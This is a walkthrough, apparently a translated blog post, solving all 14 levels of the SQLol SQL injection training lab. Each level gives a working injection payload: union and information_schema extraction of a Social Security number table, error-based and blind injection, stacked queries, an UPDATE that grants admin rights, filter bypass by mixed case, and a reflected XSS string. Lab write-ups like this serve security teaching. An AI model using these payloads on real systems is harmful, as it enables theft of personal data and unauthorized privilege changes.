SQLol challenges have 14 levels in total, and we are going to break them one by one.
Challenge 0
The goal is for the query to return all user names, not just one.
SELECT username FROM users WHERE username = 【’1’】 GROUP BY username ORDER BY username ASC
The injection point is at [1]
Union select username from users# union select username from users#
All user names can be queried.
Challenge 1
The goal is to find the tables of Social Security numbers that exist in the database and extract the information.
SELECT username FROM users WHERE username = 【’1’】 GROUP BY username ORDER BY username ASC
The injection point is at [1]. We need to know which tables and which fields there are to find out the information we want. For this purpose, we use information_SCHEMA to look up tables and columns.
Construct the POC:
‘and 1=2 UNION SELECT table_schema FROM information_schema.tables#
SELECT table_name FROM information_schema.tables WHERE table_schema=’sqlol’#
UNION SELECT column_name FROM information_schema.columns WHERE table_name=’ SSN ‘#
‘UNION SELECT concat(name, 0x7e, SSN) FROM SSN #
At this point, you have the information you want.
Challenge 2
The goal is to find the tables of Social Security numbers that exist in the database and extract the information.
SELECT username FROM users WHERE isadmin = 【1】 GROUP BY username ORDER BY username ASC
The injection point is at [1], similar to Challenge1, except that it is numeric injection and filters single quotes.
Construct the POC:
1 and 1=2 UNION SELECT table_schema FROM information_schema.tables#
Select sqLOL library lookup table, 1 and 1=2 UNION SELECT table_name FROM information_schema.tables WHERE Table_schema =0x73716C6F6C#
Select table, look up column, 1 and 1=2 UNION SELECT column_name FROM information_schema.columns WHERE table_name=0x73736E#
UNION SELECT concat(name, 0x7e, SSN) FROM SSN #
At this point, you have the information you want.
Challenge 3
The goal is to find the tables of Social Security numbers that exist in the database and extract the information.
No message is displayed, and only one line of detailed error information is displayed, similar to Challenge 1.
Construct the POC:
‘ UNION SELECT concat(name,’:’,ssn) FROM ssn LIMIT 0,1
Challenge 4
The purpose is to find out the table of social Security numbers in the database, and extract its information, without blind SQL injection technology.
Prompt, there are detailed errors, you can use error injection
Construct the POC:
‘ and extractvalue(1, concat(0x5c,(select user())))#
‘ AND ExtractValue(1,concat(0x01,(select concat(name,’:’,ssn) from ssn limit 0,1)))#
Challenge 5
The goal is to find the tables of Social Security numbers that exist in the database and extract the information.
Prompt, blind injection is used, no input error information
Construct the POC:
1′ or length(database())=5#
ASCII (mid(database(),1,1))=115#
Take your time, you’ll figure it out, and that’s the way it works.
Challenge 6
The goal is to create a new table called “IPwntyourDB” using the stacked query.
Construct the POC:
SELECT username FROM users WHERE username = ‘Herp Derper’; create table ipwntyourdb( id VARCHAR(100) NOT NULL)# GROUP BY username ORDER BY username ASC
Challenge 7
The goal is to find a table of Social Security numbers that exists in the database and remove anything from the database to extract its information.
Prompt: delete, error, query does not display
POC:
DELETE FROM users WHERE username = ” or updatexml(1,concat(0x7e,(version()),0x7e),0) or”
Challenge 8
The goal is to find a table of Social Security numbers that exists in the database and extract the information.
Tip: have a blacklist filter, need to bypass, filtering the union, the select, where, and, or,,, # characters, etc.
POC:
‘ uNion seLect concat(name,’:’,ssn) from ssn uNion selEct null from users whEre username=’
Challenge 9
The goal is to inject the query and cause it to update user “isadmin” with ID 3 to 1.
UPDATE users SET isadmin = 1 WHERE id = 3
How do I concatenate this statement to the original injection point and execute it successfully?
POC:
UPDATE users SET username = ‘admin’, isadmin = 1 WHERE id = 3#
Change username (3) to admin and isadmin (1);
Challenge 10
The goal is to get a Social Security number from a database.
SELECT [1] FROM users WHERE isadmin = 0 GROUP BY username ORDER BY username ASC
POC:
seLect concat(name,’:’,ssn) from ssn#
Challenge 11
The goal is to get a Social Security number from a database.
POC:
SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1))) ASC
Challenge 12
The goal is to use an SQL injection vulnerability to perform reflective cross-site scripting attacks.
POC:
1′ and <script>alert(11)</script>#
SELECT username FROM users WHERE username = ‘ 1′ and <script>alert(11)</script>#’ GROUP BY username ORDER BY username ASC
During execution, an error will be displayed, and the following message will pop up:
SELECT username FROM users WHERE username = ‘1’ and #’ GROUP BY username ORDER BY username ASC
The JavaScript script has successfully run in the browser.
Challenge 13
The goal is to retrieve all user names from the database.
POC:
Select username from users where username LIKE ‘2’ or 1=1
Filter single quotes:
Blind injection by fuzzy query method,
% indicates zero or more characters
_ indicates any single character
[], representing one of the characters listed in character parentheses
[^], characters that are not listed here
Determine if the page returns correctly.
Get the first character of username
Select username from users where username LIKE ‘P%’ LIMIT 0,1
2. Determine the number of characters beginning with P
Select username from users where username LIKE ‘P__________’ LIMIT 0,1
3. Keep guessing…
About me: A network security enthusiast, dedicated to sharing original high-quality dry goods, welcome to follow my personal wechat public account: Bypass–, browse more wonderful articles.
